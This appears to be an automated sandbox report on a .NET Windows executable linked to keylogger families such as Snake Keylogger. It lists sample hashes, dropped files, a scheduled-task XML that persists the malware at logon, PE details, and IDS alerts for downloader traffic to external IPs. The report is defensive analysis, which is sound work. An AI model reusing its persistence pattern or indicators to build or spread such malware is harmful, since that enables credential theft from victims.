	rAttached_updat.vbs	Get hash	malicious	GuLoader, Remcos	Browse	103.76.231.42
	LPO-2024-357.exe	Get hash	malicious	AgentTesla, PureLog Stealer	Browse	199.79.62.115
	RFQ.exe	Get hash	malicious	AgentTesla, PureLog Stealer	Browse	162.251.80.30

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
54328bd36c14bd82ddaa0c04b25ed9ad	cavKcghGwI.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	104.21.67.152
	8WLOyt9f86.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	104.21.67.152
	P1ebFAGfmb.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	104.21.67.152
	e5V82nhCVL.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	104.21.67.152
	2pbdb4M4xV.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	104.21.67.152
	CDKA9pUgGJ.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	104.21.67.152
	NIsNyN2CTq.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse	104.21.67.152
	H61PaEPFJC.exe	Get hash	malicious	MassLogger RAT	Browse	104.21.67.152
	PaVWrYb4F2.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	104.21.67.152
	2xVbI4Oc7A.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	104.21.67.152
3b5074b1b5d032e5620f69f9f700ff0e	cavKcghGwI.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	8WLOyt9f86.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	P1ebFAGfmb.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	e5V82nhCVL.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	2pbdb4M4xV.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	1.exe	Get hash	malicious	Havoc, RUSTDESK	Browse	149.154.167.220
	CDKA9pUgGJ.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	https___files.catbox.moe_l2rczc.pif.exe	Get hash	malicious	Unknown	Browse	149.154.167.220
	NIsNyN2CTq.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse	149.154.167.220
	PaVWrYb4F2.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	149.154.167.220

Process:	C:\Users\user\Desktop\Ti5nuRV7y4.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	1216
Entropy (8bit):	5.34331486778365
Encrypted:	false
SSDEEP:	24:MLUE4K5E4KH1qE4qXKDE4KhKiKhg84qXKIE4oKNzKoZAE4Kze0E4j:MIHK5HKH1qHiYHKh3ogvitHo6hAHKzea
MD5:	E193AFF55D4BDD9951CB4287A7D79653
SHA1:	F94AD920B9E0EB43B5005D74552AB84EAA38E985
SHA-256:	08DD5825B4EDCC256AEB08525DCBCDA342252A9C9746BE23FBC70A801F5A596E
SHA-512:	86F6ECDB47C1A7FFA460F3BC6038ACAFC9D4DED4D1E8D1FB7B8FE9145D9D384AB4EE7A7C3BE959A25B265AFEDB8FD31BA10073EC116B65BFE3326EF2C53394E6
Malicious:	true
Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..2,"Microsoft.VisualBasic, Version=10.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\aoTiGLRa.exe.log

Download File

Process:	C:\Users\user\AppData\Roaming\aoTiGLRa.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	1216
Entropy (8bit):	5.34331486778365
Encrypted:	false
SSDEEP:	24:MLUE4K5E4KH1qE4qXKDE4KhKiKhg84qXKIE4oKNzKoZAE4Kze0E4j:MIHK5HKH1qHiYHKh3ogvitHo6hAHKzea
MD5:	E193AFF55D4BDD9951CB4287A7D79653
SHA1:	F94AD920B9E0EB43B5005D74552AB84EAA38E985
SHA-256:	08DD5825B4EDCC256AEB08525DCBCDA342252A9C9746BE23FBC70A801F5A596E
SHA-512:	86F6ECDB47C1A7FFA460F3BC6038ACAFC9D4DED4D1E8D1FB7B8FE9145D9D384AB4EE7A7C3BE959A25B265AFEDB8FD31BA10073EC116B65BFE3326EF2C53394E6
Malicious:	false
Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..2,"Microsoft.VisualBasic, Version=10.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	2232
Entropy (8bit):	5.379736180876081
Encrypted:	false
SSDEEP:	48:tWSU4y4RQmFoUeWmfgZ9tK8NPZHUm7u1iMuge//MPUyus:tLHyIFKL3IZ2KRH9Ougss
MD5:	84D0B3B07B2FABFD5D0F3E724F41E2CE
SHA1:	8CB94823F1D28AA12678C877E2E1CF0D57CE5C69
SHA-256:	9F2745B3228D5DCFA4E9B4659F5A2A58A3446B7AECD20294BA34BF3A0312E0E3
SHA-512:	DAE272A0BB99FAB9A217FD4B448DE9847795636777DE9BA769A087DA5505BBCD5B5C29EE48C1241735A4F4AC9EF61E393B859C138D1F6244DF317A664D93375F
Malicious:	false
Preview:	@...e.................................,..............@..........P................1]...E.....j.....(.Microsoft.PowerShell.Commands.ManagementH...............o..b~.D.poM......... .Microsoft.PowerShell.ConsoleHost0......................C.l]..7.s........System..4....................D...{..\|f........System.Core.D...............4..7..D.#V.............System.Management.AutomationL.................gQ?O.....x5.......#.Microsoft.Management.Infrastructure.<................t.,.lG....M...........System.Management...@................z.U..G...5.f.1........System.DirectoryServices4.................%...K... ...........System.Xml..8..................1...L..U;V.<}........System.Numerics.4.....................@.[8]'.\........System.Data.<...............i..VdqF...\|...........System.ConfigurationH................WY..2.M.&..g(g........Microsoft.PowerShell.Security...<...............V.}...@...i...........System.Transactions.P...............8..{...@.e..."4.......%.Microsoft.PowerShell.Com

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_4mendrnb.y42.ps1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_5vcj5ejc.fje.ps1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_e2x1ep0z.br4.psm1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_jq4k5jdv.o5d.psm1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_kkaco3y0.awa.ps1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_neykyzxg.tay.psm1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_vabd1ibj.m4p.psm1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_wz3xsh5w.4mu.ps1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\tmpD06F.tmp

Download File

Process:	C:\Users\user\Desktop\Ti5nuRV7y4.exe
File Type:	XML 1.0 document, ASCII text
Category:	dropped
Size (bytes):	1602
Entropy (8bit):	5.114482870542159
Encrypted:	false
SSDEEP:	24:2di4+S2qhH1jy1m4UnrKMhEMOFGpwOzNgU3ODOiIQRvh7hwrgXuNtG5xvn:cgeHgYrFdOFzOzN33ODOiDdKrsuTsv
MD5:	B3B8CA698C07C5006674032A55AFE692
SHA1:	CC7CEE4FD37C5CBE60932C309A21065A97611E43
SHA-256:	3CD141A5830F78185883E11CBAB6502189E1A88CF6BF28D26911B454D095BCE2
SHA-512:	3CB3355531FD5EA8EAE233A77EF1E3A398E76FF6F4F11E996678CAC3506277BBDFB6D09192E5B639FBD42D6540E25F373726922E22ED6CDE5146343EEF016628
Malicious:	true
Preview:	<?xml version="1.0" encoding="UTF-16"?>.<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">. <RegistrationInfo>. <Date>2014-10-25T14:27:44.8929027</Date>. <Author>user-PC\user</Author>. </RegistrationInfo>. <Triggers>. <LogonTrigger>. <Enabled>true</Enabled>. <UserId>user-PC\user</UserId>. </LogonTrigger>. <RegistrationTrigger>. <Enabled>false</Enabled>. </RegistrationTrigger>. </Triggers>. <Principals>. <Principal id="Author">. <UserId>user-PC\user</UserId>. <LogonType>InteractiveToken</LogonType>. <RunLevel>LeastPrivilege</RunLevel>. </Principal>. </Principals>. <Settings>. <MultipleInstancesPolicy>StopExisting</MultipleInstancesPolicy>. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>. <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries>. <AllowHardTerminate>false</AllowHardTerminate>. <StartWhenAvailable>true</StartWhenAvailable>.

C:\Users\user\AppData\Local\Temp\tmpECC1.tmp

Download File

Process:	C:\Users\user\AppData\Roaming\aoTiGLRa.exe
File Type:	XML 1.0 document, ASCII text
Category:	dropped
Size (bytes):	1602
Entropy (8bit):	5.114482870542159
Encrypted:	false
SSDEEP:	24:2di4+S2qhH1jy1m4UnrKMhEMOFGpwOzNgU3ODOiIQRvh7hwrgXuNtG5xvn:cgeHgYrFdOFzOzN33ODOiDdKrsuTsv
MD5:	B3B8CA698C07C5006674032A55AFE692
SHA1:	CC7CEE4FD37C5CBE60932C309A21065A97611E43
SHA-256:	3CD141A5830F78185883E11CBAB6502189E1A88CF6BF28D26911B454D095BCE2
SHA-512:	3CB3355531FD5EA8EAE233A77EF1E3A398E76FF6F4F11E996678CAC3506277BBDFB6D09192E5B639FBD42D6540E25F373726922E22ED6CDE5146343EEF016628
Malicious:	false
Preview:	<?xml version="1.0" encoding="UTF-16"?>.<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">. <RegistrationInfo>. <Date>2014-10-25T14:27:44.8929027</Date>. <Author>user-PC\user</Author>. </RegistrationInfo>. <Triggers>. <LogonTrigger>. <Enabled>true</Enabled>. <UserId>user-PC\user</UserId>. </LogonTrigger>. <RegistrationTrigger>. <Enabled>false</Enabled>. </RegistrationTrigger>. </Triggers>. <Principals>. <Principal id="Author">. <UserId>user-PC\user</UserId>. <LogonType>InteractiveToken</LogonType>. <RunLevel>LeastPrivilege</RunLevel>. </Principal>. </Principals>. <Settings>. <MultipleInstancesPolicy>StopExisting</MultipleInstancesPolicy>. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>. <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries>. <AllowHardTerminate>false</AllowHardTerminate>. <StartWhenAvailable>true</StartWhenAvailable>.

C:\Users\user\AppData\Roaming\aoTiGLRa.exe

Download File

Process:	C:\Users\user\Desktop\Ti5nuRV7y4.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	766976
Entropy (8bit):	7.7544359495252
Encrypted:	false
SSDEEP:	12288:/+Cb+eCSmSuo/HOMmO4ClOJwubAYNnv42S829nSQKYiTH/plXEX53:/Ccuo/HODCl/ubAEnS8Un7KxT7u
MD5:	3C70DF024FF5A65F0785B0075939C3FD
SHA1:	05D7F92C1A6FEC90BA6AB3A9B08944ADBFE36832
SHA-256:	228E6F4564FE08C94660250DE5FC8832CE73B21EDAD1E81F6969C9A6DEDBBFA9
SHA-512:	380B50EF861A900CF97BB3354AF8DDEC0D0FC61751E96E5C3869A646F1E0BE4ADCC493B72292230F7A1FCC536D02D0DCE9ED2A127795A0612B3D37C271925C4E
Malicious:	true
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 63%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...7GEg..............0.............6.... ........@.. ....................... ............@....................................O.......l........................................................................... ............... ..H............text...<.... ...................... ..`.rsrc...l.......,..................@..@.reloc..............................@..B........................H........C...Q...........................................................0...........(.....(.....{....&......%.r...p(....s.....%.r...p(....s.....%.r!..p(....s.......{....o.....(...+.r=..p......%...H....%.....(.....s....}........0..........s.......{....o....o......{....o....o......{....o....o......{....o....o......{....o....o......{....o....o......{....o....o.....{.....o....,..{.....o.....{.....o....rK..p(....&*.0..&........{....o.....{.....{....o.....o ......(!...o"....{...

C:\Users\user\AppData\Roaming\aoTiGLRa.exe:Zone.Identifier

Download File

Process:	C:\Users\user\Desktop\Ti5nuRV7y4.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	26
Entropy (8bit):	3.95006375643621
Encrypted:	false
SSDEEP:	3:ggPYV:rPYV
MD5:	187F488E27DB4AF347237FE461A079AD
SHA1:	6693BA299EC1881249D59262276A0D2CB21F8E64
SHA-256:	255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
SHA-512:	89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
Malicious:	true
Preview:	[ZoneTransfer]....ZoneId=0

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Entropy (8bit):	7.7544359495252
TrID:	Win32 Executable (generic) Net Framework (10011505/4) 49.83% Win32 Executable (generic) a (10002005/4) 49.78% Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36% Generic Win/DOS Executable (2004/3) 0.01% DOS Executable Generic (2002/1) 0.01%
File name:	Ti5nuRV7y4.exe
File size:	766'976 bytes
MD5:	3c70df024ff5a65f0785b0075939c3fd
SHA1:	05d7f92c1a6fec90ba6ab3a9b08944adbfe36832
SHA256:	228e6f4564fe08c94660250de5fc8832ce73b21edad1e81f6969c9a6dedbbfa9
SHA512:	380b50ef861a900cf97bb3354af8ddec0d0fc61751e96e5c3869a646f1e0be4adcc493b72292230f7a1fcc536d02d0dce9ed2a127795a0612b3d37c271925c4e
SSDEEP:	12288:/+Cb+eCSmSuo/HOMmO4ClOJwubAYNnv42S829nSQKYiTH/plXEX53:/Ccuo/HODCl/ubAEnS8Un7KxT7u
TLSH:	0FF40185226AC907E4DA5BB04460E3F563B85ECCB811D3539BFDBDFB7C2A304B549292
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...7GEg..............0.............6.... ........@.. ....................... ............@................................

File Icon


Icon Hash:	322e2e3eee6e2697

Static PE Info

General

Entrypoint:	0x4ba336
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, 32BIT_MACHINE
DLL Characteristics:	DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Time Stamp:	0x67454737 [Tue Nov 26 03:57:43 2024 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	4
OS Version Minor:	0
File Version Major:	4
File Version Minor:	0
Subsystem Version Major:	4
Subsystem Version Minor:	0
Import Hash:	f34d5f2d4577ed6d9ceec516c1f5a744

Entrypoint Preview

Instruction
jmp dword ptr [00402000h]
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0xba2e4	0x4f	.text
IMAGE_DIRECTORY_ENTRY_RESOURCE	0xbc000	0x2a6c	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0xc0000	0xc	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x2000	0x8	.text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x2008	0x48	.text
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x2000	0xb833c	0xb8400	de49671407f6303afc904d83a46f809f	False	0.9149608844979648	data	7.760400947281738	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rsrc	0xbc000	0x2a6c	0x2c00	72a809d57dbb91e5f3cabb26da644481	False	0.8670099431818182	data	7.468331500200943	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0xc0000	0xc	0x200	e5d6b5486acd60f74e64c69aee5c586d	False	0.044921875	data	0.10191042566270775	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	ZLIB Complexity
RT_ICON	0xbc100	0x241d	PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced	0.9700378583017848
RT_GROUP_ICON	0xbe530	0x14	data	1.05
RT_VERSION	0xbe554	0x318	data	0.4431818181818182
RT_MANIFEST	0xbe87c	0x1ea	XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators	0.5489795918367347

Imports

DLL	Import
mscoree.dll	_CorExeMain

Network Behavior

Suricata IDS Alerts

Timestamp	SID	Signature	Severity	Source IP	Source Port	Dest IP	Dest Port	Protocol
2024-12-05T18:51:11.090059+0100	2803274	ETPRO MALWARE Common Downloader Header Pattern UH	2	192.168.2.7	49703	132.226.8.169	80	TCP
2024-12-05T18:51:13.480698+0100	2803274	ETPRO MALWARE Common Downloader Header Pattern UH	2	192.168.2.7	49703	132.226.8.169	80	TCP
2024-12-05T18:51:15.131908+0100	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.7	49707	104.21.67.152	443	TCP
2024-12-05T18:51:16.715089+0100	2803274	ETPRO MALWARE Common Downloader Header Pattern UH	2	192.168.2.7	49708	132.226.8.169	80	TCP
2024-12-05T18:51:17.699485+0100	2803274	ETPRO MALWARE Common Downloader Header Pattern UH	2	192.168.2.7	49714	132.226.8.169	80	TCP
2024-12-05T18:51:18.372397+0100	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.7	49715	104.21.67.152	443	TCP
2024-12-05T18:51:19.949509+0100	2803274	ETPRO MALWARE Common Downloader Header Pattern UH	2	192.168.2.7	49714	132.226.8.169	80	TCP
2024-12-05T18:51:21.581396+0100	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.7	49724	104.21.67.152	443	TCP
2024-12-05T18:51:23.168230+0100	2803274	ETPRO MALWARE Common Downloader Header Pattern UH	2	192.168.2.7	49732	132.226.8.169	80	TCP
